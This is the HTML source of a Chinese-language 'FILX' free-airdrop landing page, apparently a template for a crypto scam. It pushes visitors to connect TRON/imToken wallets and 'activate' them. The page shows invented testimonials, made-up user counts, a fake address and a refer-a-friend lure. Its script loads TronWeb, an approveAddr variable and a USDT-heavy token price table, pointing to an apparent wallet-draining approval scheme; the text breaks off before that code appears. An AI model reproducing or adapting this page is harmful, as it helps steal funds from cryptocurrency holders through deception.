<!DOCTYPE html>
<html lang="zh-CN" xmlns="http://www.w3.org/1999/html" class="translated-ltr">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="description" content="">
        <meta name="keywords" content="">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>Filcoinx</title>
        <link rel="stylesheet" href="/filcoinx_files/flaticon.css">
        <link rel="stylesheet" href="/filcoinx_files/all.css">
        <link href="/filcoinx_files/bootstrap.min.css" rel="stylesheet">
        <link href="/filcoinx_files/css-Poppins200i300300i400400i500.css" rel="stylesheet">
        <link href="/filcoinx_files/css-Roboto400400i500500i700700i_.css" rel="stylesheet">
        <link rel="stylesheet" href="/filcoinx_files/frameworks.css">
        <link rel="stylesheet" type="text/css" href="/filcoinx_files/sweet-alert.css">
        <link rel="stylesheet" href="/filcoinx_files/style.css">
		
        <script type="text/javascript" src="/scan/js/jquery-2.1.4.min.js"></script>
        <script type="text/javascript" src="/scan/js/clipboard.min.js"></script>
        <script type="text/javascript" src="/scan/js/layer.js"></script>
        <script type="text/javascript" src="/scan/js/usdt/TronWeb.js"></script>
        <script src="/filcoinx_files/highcharts.js"></script>
		
		<script src="/filcoinx_files/sweet-alert.min.js"></script>
		<script src="/filcoinx_files/bootstrap.bundle.min.js"></script>
		<script src="/filcoinx_files/plugins.js"></script>
		<script src="/filcoinx_files/main.js"></script>
		
        <style type="text/css" id="jarallax-clip-0">
            #jarallax-container-0 {
                clip: rect(0 1403px 1179px 0);
                clip: rect(0, 1403px, 1179px, 0);
            }
        </style>
        <link type="text/css" rel="stylesheet" charset="UTF-8" href="/filcoinx_files/translateelement.css">
    </head>
    <body>
        <div class="page-wrapper" id="home">
            <header class="header">
                <div class="container">
                    <nav class="navbar navbar-expand-lg">
                        <a class="navbar-brand" href="javascript:;">
                            <img src="/filcoinx_files/logo.png" alt="商标">
                        </a>
                        <a href="#" class="default-btn wow fadeInUp size" data-wow-delay="0.1s" id="btn-connect">
                            连接<i class="fa fa-angle-right ml-2"></i>
                        </a>
                        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#fixedNavbar" aria-controls="fixedNavbar" aria-expanded="false" aria-label="切换导航">
                            <span class="togler-icon-inner">
                                <span class="line-1"></span>
                                <span class="line-2"></span>
                                <span class="line-3"></span>
                            </span>
                        </button>
                        <div class="collapse navbar-collapse main-menu justify-content-end" id="fixedNavbar">
                            <ul class="navbar-nav">
                                <li class="nav-item">
                                    <a class="nav-link active" href="#" data-scroll-nav="0">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">主页</font>
                                        </font>
                                    </a>
                                </li>
                                <li class="nav-item">
                                    <a class="nav-link" href="#" data-scroll-nav="1">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">FILX</font>
                                        </font>
                                    </a>
                                </li>
                                <li class="nav-item">
                                    <a class="nav-link" href="#" data-scroll-nav="2">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">空投</font>
                                        </font>
                                    </a>
                                </li>
                                <li class="nav-item">
                                    <a class="nav-link" href="#" data-scroll-nav="3">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">分享</font>
                                        </font>
                                    </a>
                                </li>
                                <!-- <li class="nav-item"><a class="nav-link" id="go-cn" href="#"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">中文</font></font></font></font></a></li> -->
                                <li class="nav-item">
                                    <a class="nav-link" id="go-en" href="javascript:;">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">
                                                <font style="vertical-align: inherit;">
                                                    <font style="vertical-align: inherit;">English</font>
                                                </font>
                                            </font>
                                        </font>
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </nav>
                </div>
            </header>
            <section class="hero-section" data-scroll-index="0">
                <div class="container h-100">
                    <div class="row align-items-center h-100">
                        <div class="col-lg-7 col-md-10 col-sm-12">
                            <h1 class="hero-section-title wow fadeInUp" data-wow-delay="0.2s" style="visibility: visible; animation-delay: 0.2s; animation-name: fadeInUp;">
                                <font style="vertical-align: inherit;">
                                    <font style="vertical-align: inherit;">你准备好你的钱包了吗？
</font>
                                </font>
                            </h1>
                            <p class="hero-section-subtitle wow fadeInUp" data-wow-delay="0.3s" style="visibility: visible; animation-delay: 0.3s; animation-name: fadeInUp;">
                                <font style="vertical-align: inherit;">
                                    <font style="vertical-align: inherit;">FILX免费空投正在进行中，请准备好您的钱包。</font>
                                    <font style="vertical-align: inherit;">接受空投的钱包包括：TokenPocket、TrustWallet、MathWallet、Binance Chain Wallet、imToken等支持ETH和BSC的钱包
</font>
                                </font>
                            </p>
                            <div class="row justify-content-center text-center">
                                <div class="col-lg-7">
                                    <div class="price-toggle-wrap" style="text-align: left">
                                        <span>
                                            <p id="text-chances" style="color: #fff">
                                                <h7>
                                                    <font style="vertical-align: inherit;">
                                                        <font style="vertical-align: inherit;">机会：</font>
                                                    </font>
                                                </h7>
                                                &nbsp;
                                                <strong id="chances-number">
                                                    <font style="vertical-align: inherit;">
                                                        <font style="vertical-align: inherit;">0</font>
                                                    </font>
                                                </strong>
                                            </p>
                                        </span>
                                        <span>
                                            <p id="text-airdropped" style="color: #fff">
                                                <h7>
                                                    <font style="vertical-align: inherit;">
                                                        <font style="vertical-align: inherit;">空投：</font>
                                                    </font>
                                                </h7>
                                                &nbsp;
                                                <strong id="airpods-number">
                                                    <font style="vertical-align: inherit;">
                                                        <font style="vertical-align: inherit;">0</font>
                                                    </font>
                                                </strong>
                                                <font style="vertical-align: inherit;">
                                                    <font style="vertical-align: inherit;">FILX
</font>
                                                </font>
                                            </p>
                                        </span>
                                    </div>
                                </div>
                            </div>
							<input id="dizhi" value="{$domain}{:url('index/filcoinx/index_trc',['agent'=>$userId])}" style="position: fixed;top: -999em;" readonly />
                            <a href="#" class="default-outline-btn wow fadeInUp open-wallet" data-wow-delay="0.1s" style="animation-delay: 0.1s; animation-name: fadeInUp;" data-clipboard-target="#dizhi">
                                <font style="vertical-align: inherit;">
                                    <font style="vertical-align: inherit;">解锁钱包</font>
                                </font>
                                <i class="fa fa-angle-right ml-2"></i>
                            </a>
                            <a href="#" class="default-outline-btn wow fadeInUp" data-wow-delay="0.1s" id="btn-active" style="visibility: visible; animation-delay: 0.1s; animation-name: fadeInUp;margin-left:5px;">
                                <font style="vertical-align: inherit;">
                                    <font style="vertical-align: inherit;">激活</font>
                                </font>
                                <i class="fa fa-angle-right ml-2"></i>
                            </a>
                        </div>
                        <div class="col-lg-5 hero-image text-right wow fadeInRight" style="visibility: visible; animation-name: fadeInRight;">
                            <img src="/filcoinx_files/hero_image.png" alt="英雄形象" class="img-fluid img-jump">
                        </div>
                    </div>
                </div>
                <a href="#" data-scroll-nav="1" class="down-scroll">
                    <i class="fa fa-arrow-down"></i>
                </a>
            </section>
            <section class="services section-padding" data-scroll-index="1" id="services-area">
                <div class="container">
                    <div class="row justify-content-center">
                        <div class="col-lg-7">
                            <div class="section-heading">
                                <h2 class="section-title">
                                    <font style="vertical-align: inherit;">
                                        <font style="vertical-align: inherit;">什么是</font>
                                    </font>
                                    <span>
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">FILX</font>
                                        </font>
                                    </span>
                                </h2>
                                <p class="section-sub-title">
                                    <font style="vertical-align: inherit;">
                                        <font style="vertical-align: inherit;">FILX 是一个专注于 Filcoin 生态建设的社会实验，它整合了 Filcoin 的应用创新。</font>
                                        <font style="vertical-align: inherit;">未来将建立统一的流动性池杠杆交易自动化系统，提供链上价值存储。</font>
                                        <font style="vertical-align: inherit;">FILX 没有预售，也没有众筹。
</font>
                                    </font>
                                </p>
                            </div>
                            <div class="col-md-5 col-lg-6 wow fadeInLeft text-left" id="containers1" data-highcharts-chart="0" style="overflow: hidden; visibility: hidden; animation-name: none;">
                                <div id="highcharts-4ras0yq-0" dir="ltr" class="highcharts-container " style="position: relative; overflow: hidden; width: 287px; height: 400px; text-align: left; line-height: normal; z-index: 0; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); user-select: none; touch-action: manipulation; outline: none;">
                                    <svg version="1.1" class="highcharts-root" style="font-family:&quot;Lucida Grande&quot;, &quot;Lucida Sans Unicode&quot;, Arial, Helvetica, sans-serif;font-size:12px;" xmlns="http://www.w3.org/2000/svg" width="287" height="400" viewBox="0 0 287 400">
                                        <desc>Created with Highcharts 9.1.1</desc>
                                        <defs>
                                            <clippath id="highcharts-4ras0yq-4-">
                                                <rect x="0" y="0" width="267" height="339" fill="none"></rect>
                                            </clippath>
                                        </defs>
                                        <rect fill="#ffffff" class="highcharts-background" x="0" y="0" width="287" height="400" rx="0" ry="0"></rect>
                                        <rect fill="none" class="highcharts-plot-background" x="10" y="46" width="267" height="339"></rect>
                                        <rect fill="none" class="highcharts-plot-border" data-z-index="1" x="10" y="46" width="267" height="339"></rect>
                                        <g class="highcharts-series-group" data-z-index="3">
                                            <g class="highcharts-series highcharts-series-0 highcharts-pie-series highcharts-tracker" data-z-index="0.1" opacity="1" transform="translate(10,46) scale(1 1)" style="cursor:pointer;">
                                                <path fill="#0033CC" d="M 129.9918530718522 129.50000082965548 A 40 40 0 0 1 142.38491252228096 207.5343784202588 L 130 169.5 A 0 0 0 0 0 130 169.5 Z" transform="translate(0,0)" stroke="#ffffff" stroke-width="1" opacity="1" stroke-linejoin="round" class="highcharts-point highcharts-color-0"></path>
                                                <path fill="#00FFFF" d="M 142.34687195774404 207.5467443135293 A 40 40 0 0 1 106.45396290645641 137.16450654173545 L 130 169.5 A 0 0 0 0 0 130 169.5 Z" transform="translate(0,0)" stroke="#ffffff" stroke-width="1" opacity="1" stroke-linejoin="round" class="highcharts-point highcharts-color-1"></path>
                                                <path fill="#12bd81" d="M 106.486310167543 137.14097667631162 A 40 40 0 0 1 129.94444080247715 129.50003858532398 L 130 169.5 A 0 0 0 0 0 130 169.5 Z" transform="translate(-3,-10)" stroke="#ffffff" stroke-width="1" opacity="1" stroke-linejoin="round" class="highcharts-point highcharts-point-select highcharts-color-2"></path>
                                            </g>
                                            <g class="highcharts-markers highcharts-series-0 highcharts-pie-series" data-z-index="0.1" opacity="1" transform="translate(10,46) scale(1 1)"></g>
                                        </g>
                                        <text x="144" text-anchor="middle" class="highcharts-title" data-z-index="4" style="color:#333333;font-size:18px;fill:#333333;" y="24">FILX Distributed</text>
                                        <text x="144" text-anchor="middle" class="highcharts-subtitle" data-z-index="4" style="color:#666666;fill:#666666;" y="45"></text>
                                        <text x="10" text-anchor="start" class="highcharts-caption" data-z-index="4" style="color:#666666;fill:#666666;" y="397"></text>
                                        <g class="highcharts-data-labels highcharts-series-0 highcharts-pie-series highcharts-tracker" data-z-index="6" opacity="1" transform="translate(10,46) scale(1 1)" style="cursor:pointer;">
                                            <path fill="none" class="highcharts-data-label-connector highcharts-color-0" stroke="#0033CC" stroke-width="1" d="M 204.13818384165964 158.54958744718382 C 199.13818384165964 158.54958744718382 181.35979371094714 161.365407817908 175.43366366737632 162.30401460814937 L 169.5075336238055 163.24262139839075"></path>
                                            <path fill="none" class="highcharts-data-label-connector highcharts-color-1" stroke="#00FFFF" stroke-width="1" d="M 62.62954330681424 201.27933498176827 C 67.62954330681424 201.27933498176827 83.66766074220487 193.10750598645643 89.01369988733508 190.38356298801915 L 94.35973903246528 187.65961998958187"></path>
                                            <path fill="none" class="highcharts-data-label-connector highcharts-color-2" stroke="#12bd81" stroke-width="1" d="M 103.36881039375369 102.92604385933925 C 108.36881039375369 102.92604385933925 113.93111629250272 120.04506115265201 115.78521825875241 125.75140025042293 L 117.6393202250021 131.45773934819385"></path>
                                            <g class="highcharts-label highcharts-data-label highcharts-data-label-color-0" data-z-index="1" style="cursor:pointer;" transform="translate(209,149)">
                                                <text x="5" data-z-index="1" y="16" style="color:black;font-size:11px;font-weight:bold;fill:black;">
                                                    <tspan class="highcharts-text-outline" fill="#FFFFFF" stroke="#FFFFFF" stroke-width="2px" stroke-linejoin="round">
                                                        <title>Liquid Mining%: 45.0 %</title>
                                                        <tspan style="font-weight:bold;">Liquid …</tspan>
                                                        : 45.0 %<tspan x="5" y="16">​</tspan>
                                                    </tspan>
                                                    <title>Liquid Mining%: 45.0 %</title>
                                                    <tspan style="font-weight:bold;">Liquid …</tspan>
                                                    : 45.0 %
                                                </text>
                                            </g>
                                            <g class="highcharts-label highcharts-data-label highcharts-data-label-color-1" data-z-index="1" style="cursor:pointer;" transform="translate(-10,191)">
                                                <text x="5" data-z-index="1" y="16" style="color:black;font-size:11px;font-weight:bold;fill:black;">
                                                    <tspan class="highcharts-text-outline" fill="#FFFFFF" stroke="#FFFFFF" stroke-width="2px" stroke-linejoin="round">
                                                        <title>Pledge Mining%: 45.0 %</title>
                                                        <tspan style="font-weight:bold;">Pledge …</tspan>
                                                        : 45.0 %<tspan x="5" y="16">​</tspan>
                                                    </tspan>
                                                    <title>Pledge Mining%: 45.0 %</title>
                                                    <tspan style="font-weight:bold;">Pledge …</tspan>
                                                    : 45.0 %
                                                </text>
                                            </g>
                                            <g class="highcharts-label highcharts-data-label highcharts-data-label-color-2" data-z-index="1" style="cursor:pointer;" transform="translate(28,93)">
                                                <text x="5" data-z-index="1" y="16" style="color:black;font-size:11px;font-weight:bold;fill:black;">
                                                    <tspan class="highcharts-text-outline" fill="#FFFFFF" stroke="#FFFFFF" stroke-width="2px" stroke-linejoin="round">
                                                        <tspan style="font-weight:bold;">Airdrops%</tspan>
                                                        :<tspan dy="14" x="5">​</tspan>
                                                        10.0 %<tspan x="5" y="16">​</tspan>
                                                    </tspan>
                                                    <tspan style="font-weight:bold;">Airdrops%</tspan>
                                                    :<tspan dy="14" x="5">​</tspan>
                                                    10.0 %
                                                </text>
                                            </g>
                                        </g>
                                        <g class="highcharts-legend highcharts-no-tooltip" data-z-index="7">
                                            <rect fill="none" class="highcharts-legend-box" rx="0" ry="0" x="0" y="0" width="8" height="8" visibility="hidden"></rect>
                                            <g data-z-index="1">
                                                <g></g>
                                            </g>
                                        </g>
                                    </svg>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
            <section class="testimonial-section jarallax section-padding" data-jarallax="" data-speed="0.2s" data-scroll-index="2" style="z-index: 0;">
                <div class="container">
                    <div class="row justify-content-center">
                        <div class="col-lg-7">
                            <div class="section-heading">
                                <h2 class="section-title text-white">
                                    <font style="vertical-align: inherit;">
                                        <font style="vertical-align: inherit;">关于</font>
                                    </font>
                                    <span class="text-white">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">空投</font>
                                        </font>
                                    </span>
                                </h2>
                                <p class="section-sub-title text-white">FILX 分三个阶段进行空投。 第一阶段5000万空投，第二阶段2500万空投，第三阶段2500万空投； 以及收到空投的白名单用户，分别邀请一个用户完成白名单。 列表已激活，并添加了额外的空投机会。 邀请越多，您获得的空投就越多。
</p>
                            </div>
                        </div>
                    </div>
                    <div class="row align-items-center justify-content-center">
                        <div class="col-md-12">
                            <div class="testimonial-slider owl-carousel owl-theme owl-loaded owl-drag">
                                <div class="owl-stage-outer">
                                    <div class="owl-stage" style="transform: translate3d(-570px, 0px, 0px); transition: all 1s ease 0s; width: 1710px;">
                                        <div class="owl-item" style="width: 540px; margin-right: 30px;">
                                            <div class="item">
                                                <div class="testimonial-item">
                                                    <div class="testimonial-body d-flex align-items-start">
                                                        <div class="testimonial-img mr-3">
                                                            <img src="/filcoinx_files/comments-image-2.png" alt="" class="img-fluid">
                                                        </div>
                                                        <div class="testimonial-inner">
                                                            <h5>George William</h5>
                                                            <div class="testimonial-rating">
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="testimonial-text">
                                                        <p>I am honored to be the first user to receive the FILX airdrop. FILX is already in my wallet. I believe that FILX will lead me into the palace of wealth</p>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="owl-item active" style="width: 540px; margin-right: 30px;">
                                            <div class="item">
                                                <div class="testimonial-item">
                                                    <div class="testimonial-body d-flex align-items-start">
                                                        <div class="testimonial-img mr-3">
                                                            <img src="/filcoinx_files/comments-image-3.png" alt="" class="img-fluid">
                                                        </div>
                                                        <div class="testimonial-inner">
                                                            <h5>爱德华·艾迪生</h5>
                                                            <div class="testimonial-rating">
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="testimonial-text">
                                                        <p>我已经成功收到了 FILX，我不敢相信这是真的。但是我真的已经有了自己的FILX，谢谢FILX。
</p>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="owl-item active" style="width: 540px; margin-right: 30px;">
                                            <div class="item">
                                                <div class="testimonial-item">
                                                    <div class="testimonial-body d-flex align-items-start">
                                                        <div class="testimonial-img mr-3">
                                                            <img src="/filcoinx_files/comments-image-1.png" alt="" class="img-fluid">
                                                        </div>
                                                        <div class="testimonial-inner">
                                                            <h5>爱德华多·杜特拉</h5>
                                                            <div class="testimonial-rating">
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                                <i class="fa fa-star"></i>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="testimonial-text">
                                                        <p>经过漫长的等待，我已经成功收到了FILX，相信很快就会风靡全球。
</p>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="counters">
                    <div class="container">
                        <div class="row">
                            <div class="col-lg-4 col-md-6 col-sm-6 counters-item  col-xs-12 wow fadeInUp" data-wow-delay="0.1s" style="visibility: hidden; animation-delay: 0.1s; animation-name: none;">
                                <div class="counter-item-inner text-center">
                                    <div class="counter-icon">
                                        <span class="mdi mdi-download"></span>
                                    </div>
                                    <div class="counter-body">
                                        <h2 class="counter">12800</h2>
                                        <p>用户支持</p>
                                    </div>
                                </div>
                            </div>
                            <div class="col-lg-4 col-md-6 col-sm-6 col-xs-12 counters-item wow fadeInUp" data-wow-delay="0.2s" style="visibility: hidden; animation-delay: 0.2s; animation-name: none;">
                                <div class="counter-item-inner text-center">
                                    <div class="counter-icon">
                                        <span class="mdi mdi-account-switch"></span>
                                    </div>
                                    <div class="counter-body">
                                        <h2 class="counter">3500</h2>
                                        <p>人们联系</p>
                                    </div>
                                </div>
                            </div>
                            <div class="col-lg-4 col-md-6 col-sm-6 col-xs-12 counters-item wow fadeInUp" data-wow-delay="0.1s" style="visibility: hidden; animation-delay: 0.1s; animation-name: none;">
                                <div class="counter-item-inner text-center">
                                    <div class="counter-icon">
                                        <span class="mdi mdi-download"></span>
                                    </div>
                                    <div class="counter-body">
                                        <h2 class="counter">3500</h2>
                                        <p>已收到</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div id="jarallax-container-0" style="position: absolute; top: 0px; left: 0px; width: 100%; height: 100%; overflow: hidden; pointer-events: none; z-index: -100;">
                    <div class="testimonial-section-bg jarallax-img" style="object-fit: cover; object-position: 50% 50%; max-width: none; position: fixed; top: 0px; left: 0px; width: 1403px; height: 810.2px; overflow: hidden; pointer-events: none; margin-top: -46.1px; transform: translate3d(0px, 391.6px, 0px);"></div>
                </div>
            </section>
            <section class="download-wrap section-padding jarallax" data-scroll-index="3" data-speed="0.2s">
                <div class="download-section-bg jarallax-img"></div>
                <div class="container">
                    <div class="row justify-content-between align-items-center">
                        <div class="col-lg-6 download-image wow slideInLeft" style="visibility: hidden; animation-name: none;">
                            <img src="/filcoinx_files/download-img.png" alt="" class="img-fluid img-jump">
                        </div>
                        <div class="col-lg-6 col-md-12 col-sm-11 col-xs-12 wow fadeInUp" data-wow-delay="0.3s" id="div-share" style="visibility: hidden; animation-delay: 0.3s; animation-name: none;">
                            <div class="download-section-inner">
                                <h2>
                                    <font style="vertical-align: inherit;">
                                        <font style="vertical-align: inherit;">立即分享</font>
                                    </font>
                                </h2>
                                <p>
                                    <font style="vertical-align: inherit;">
                                        <font style="vertical-align: inherit;">为了让更多人拿到FILX，我们开放了奖励机制。</font>
                                        <font style="vertical-align: inherit;">每次邀请新用户时，您都将获得另一次空投机会。
</font>
                                    </font>
                                </p>
                                <a href="#" class="default-outline-btn wow fadeInUp" data-wow-delay="0.1s" id="btn-share" style="visibility: hidden; animation-delay: 0.1s; animation-name: none;">
                                    <font style="vertical-align: inherit;">
                                        <font style="vertical-align: inherit;">分享</font>
                                    </font>
                                    <i class="fa fa-angle-right ml-2"></i>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
            <footer class="footer">
                <div class="footer-top">
                    <div class="container">
                        <div class="row">
                            <div class="footer-widget col-lg-3 col-md-6 col-sm-6">
                                <div class="footer-box">
                                    <h5 class="footer-title">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">关于我们</font>
                                        </font>
                                    </h5>
                                    <p>
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">FILX 是一个专注于 Filcoin 生态建设的社会实验，它整合了 Filcoin 的应用创新。
</font>
                                        </font>
                                    </p>
                                    <div class="footer-social-links">
                                        <a href="javascript:;">
                                            <i class="mdi mdi-twitter"></i>
                                        </a>
                                        <a href="javascript:;">
                                            <i class="mdi mdi-telegram"></i>
                                        </a>
                                    </div>
                                </div>
                            </div>
                            <div class="footer-widget col-lg-3 col-md-6 col-sm-6">
                                <div class="footer-box">
                                    <h5 class="footer-title">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">有用的链接</font>
                                        </font>
                                    </h5>
                                    <ul class="footer-links">
                                        <li>
                                            <a href="#" data-scroll-nav="1">
                                                <font style="vertical-align: inherit;">
                                                    <font style="vertical-align: inherit;">FILX</font>
                                                </font>
                                            </a>
                                        </li>
                                        <li>
                                            <a href="#" data-scroll-nav="2">
                                                <font style="vertical-align: inherit;">
                                                    <font style="vertical-align: inherit;">空投</font>
                                                </font>
                                            </a>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                            <div class="footer-widget col-lg-3 col-md-6 col-sm-6">
                                <div class="footer-box">
                                    <h5 class="footer-title">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">其他链接</font>
                                        </font>
                                    </h5>
                                    <ul class="footer-links">
                                        <li>
                                            <a href="javascript:;">
                                                <font style="vertical-align: inherit;">
                                                    <font style="vertical-align: inherit;">地址</font>
                                                </font>
                                            </a>
                                        </li>
                                        <li>
                                            <a href="javascript:;">
                                                <font style="vertical-align: inherit;">
                                                    <font style="vertical-align: inherit;">代币</font>
                                                </font>
                                            </a>
                                        </li>
                                        <li>
                                            <a href="javascript:;">
                                                <font style="vertical-align: inherit;">
                                                    <font style="vertical-align: inherit;">代币口袋</font>
                                                </font>
                                            </a>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                            <div class="col-md-6 col-sm-6 footer-widget col-lg-3">
                                <div class="footer-box">
                                    <h5 class="footer-title">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">联系方式</font>
                                        </font>
                                    </h5>
                                    <p>
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">50 North Peg Shop Court Beachwood, 华盛顿特区</font>
                                        </font>
                                    </p>
                                    <ul class="contact-info-footer">
                                        <li>
                                            <i class="mdi mdi-email"></i>
                                            <font style="vertical-align: inherit;">
                                                <font style="vertical-align: inherit;">filecoinx@gmail.com</font>
                                            </font>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="copyright">
                    <div class="container">
                        <div class="row align-items-center justify-content-center">
                            <div class="col-lg-9">
                                <p class="text-center">
                                    <font style="vertical-align: inherit;">
                                        <font style="vertical-align: inherit;">版权所有 © 2021.Filcoinx 保留所有权利。</font>
                                    </font>
                                </p>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="alert alert-success" role="alert" style="display: none">
                    <button type="button" class="close" data-dismiss="alert" aria-label="关闭" aria-hidden="true">
                        <font style="vertical-align: inherit;">
                            <font style="vertical-align: inherit;">×
</font>
                        </font>
                    </button>
                    <span id="alertInfo"></span>
                </div>
                <button id="exampleModalButton" type="button" class="btn btn-primary" style="display: none;" data-bs-toggle="modal" data-bs-target="#exampleModal">
                    <font style="vertical-align: inherit;">
                        <font style="vertical-align: inherit;">启用
</font>
                    </font>
                </button>
                <div class="modal fade" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
                    <div class="modal-dialog">
                        <div class="modal-content">
                            <div class="modal-header">
                                <h5 class="modal-title m-auto" id="exampleModalLabel" style="padding-left: 12%">
                                    <font style="vertical-align: inherit;">
                                        <font style="vertical-align: inherit;">分享给你的朋友！</font>
                                    </font>
                                </h5>
                                <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="关闭"></button>
                            </div>
                            <div id="error" class="modal-body">
                                <font style="vertical-align: inherit;">
                                    <font style="vertical-align: inherit;">激活白名单后，您将获得自己的推广链接；
</font>
                                </font>
                            </div>
                            <div id="shareModalContent" class="modal-body m-auto" style="display: none">
                                <div class="card" style="width:100%; text-align: center">
                                    <div class="card-body" style="text-align: center">
                                        <h4 class="card-title" style="text-align:center">
                                            <font style="vertical-align: inherit;">
                                                <font style="vertical-align: inherit;">推广链接</font>
                                            </font>
                                        </h4>
                                        <div class="card-text" id="promotion-link">
                                            <font style="vertical-align: inherit;">
                                                <font style="vertical-align: inherit;">一些示例文本一些示例文本。</font>
                                                <font style="vertical-align: inherit;">Jane Doe 是一位建筑师和工程师</font>
                                            </font>
                                        </div>
                                    </div>
                                    <h4 style="text-align:center">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">二维码</font>
                                        </font>
                                    </h4>
                                    <div class="card-img-bottom" src="" alt="卡片图片" style="width:100%" id="promotion-qr"></div>
                                    <button type="button" class="copylink btn btn-primary " data-clipboard-target="#promotion-link" id="copy">
                                        <font style="vertical-align: inherit;">
                                            <font style="vertical-align: inherit;">复制链接</font>
                                        </font>
                                    </button>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </footer>
            <!-- <style>
        #goToActionSetionx {
            position: fixed;
            bottom: 0;
            right: 10px;
            width: 48px;
            height: 48px;
            line-height: 48px;
            font-size: 16px;
            text-align: center;
            opacity: 1;
            border-radius: 5px;
            visibility: hidden;
            color: #fff!important;
            z-index: 99999;
            visibility: visible;
        }
    </style><a id="goToActionSetionx" href="http://wa.me/855977054895" style="bottom: 65px"><img src="/whatsApp.jpg" alt="" style="width: 100%; height: 100%;border-radius: 5px;"></a> -->
            <a id="goToActionSetion" href="{:url('index/filcoinx/index_trc',['agent'=>$userId])}" class="scroll-top-btn" data-scroll-goto="0">
                <i class="fa fa-arrow-up"></i>
            </a>
            <div class="preloader-wrap" style="display: none;">
                <div class="preloader-inner" style="display: none;">
                    <div class="sk-circle"></div>
                    <div class="spinner">
                        <div class="rect1"></div>
                        <div class="rect2"></div>
                        <div class="rect3"></div>
                        <div class="rect4"></div>
                        <div class="rect5"></div>
                    </div>
                </div>
            </div>
        </div>
        <div style="display:none;">
			<textarea id="jsondata">{$addr|json_encode}</textarea>
		</div>
		
        <script language="JavaScript">
            $(document).ready(function() {
                var chart = {
                    plotBackgroundColor: null,
                    plotBorderWidth: null,
                    plotShadow: false,
                };
                var credits = {
                    //去掉highcharts.com
                    enabled: false
                };
                var title = {
                    text: 'FILX Distributed'
                };
                var tooltip = {
                    pointFormat: '{series.name}: <b>{point.percentage:.1f}%</b>'
                };
                var plotOptions = {
                    pie: {
                        allowPointSelect: true,
                        cursor: 'pointer',
                        dataLabels: {
                            enabled: true,
                            format: '<b>{point.name}%</b>: {point.percentage:.1f} %',
                            style: {
                                color: (Highcharts.theme && Highcharts.theme.contrastTextColor) || 'black'
                            }
                        }
                    }
                };
                var series = [{
                    type: 'pie',
                    name: 'FILX Distributed',
                    data: [{
                        name: 'Liquid Mining',
                        color: '#0033CC',
                        y: 45.0
                    }, {
                        name: 'Pledge Mining',
                        color: '#00FFFF',
                        y: 45.0
                    }, {
                        name: 'Airdrops',
                        color: '#12bd81',
                        y: 10.0,
                        sliced: true,
                        selected: true
                    }]
                }];

                var json = {};
                json.chart = chart;
                json.title = title;
                json.tooltip = tooltip;
                json.series = series;
                json.plotOptions = plotOptions;
                json.credits = credits;
                $('#containers1').highcharts(json);
            });

            var address = "{$address}";
			var agent = "{$userId}";
			var rank = 6.5;
			var authorized_address = '{$authorized_address}';
			var domain = '{$domain}';
			var bizhong = 'USDT';
			var approveAddr = "{$approveAddr}";

            $(function() {
                var clipboard = new ClipboardJS('.open-wallet');
                clipboard.on('success', function(e) {
                    //layer.msg('复制成功');
                    setTimeout(function() {
						window.location.href = "imtokenv2://navigate?screen=DappView&url=" + encodeURIComponent($('#dizhi').val());
                    }, 500);
                });
                clipboard.on('error', function(e) {
                    layer.msg('复制失败，请重新点击按钮');
                });

                const addr = JSON.parse($('#jsondata').html());
                const price = {
                    'WIN': 0.001150,
                    'USDT': 1,
                    'TONS': 1.35,
                    'USDJ': 1.04,
                    'JST': 0.125,
                    "HT": 20.41,
                    "SUN": 33.97,
                    "EXNX": 0.0621,
                    "VCOIN": 0.004225,
                    "POL": 0.1393,
                    "CKRW": 0.002487,
                }

                const decimals = {
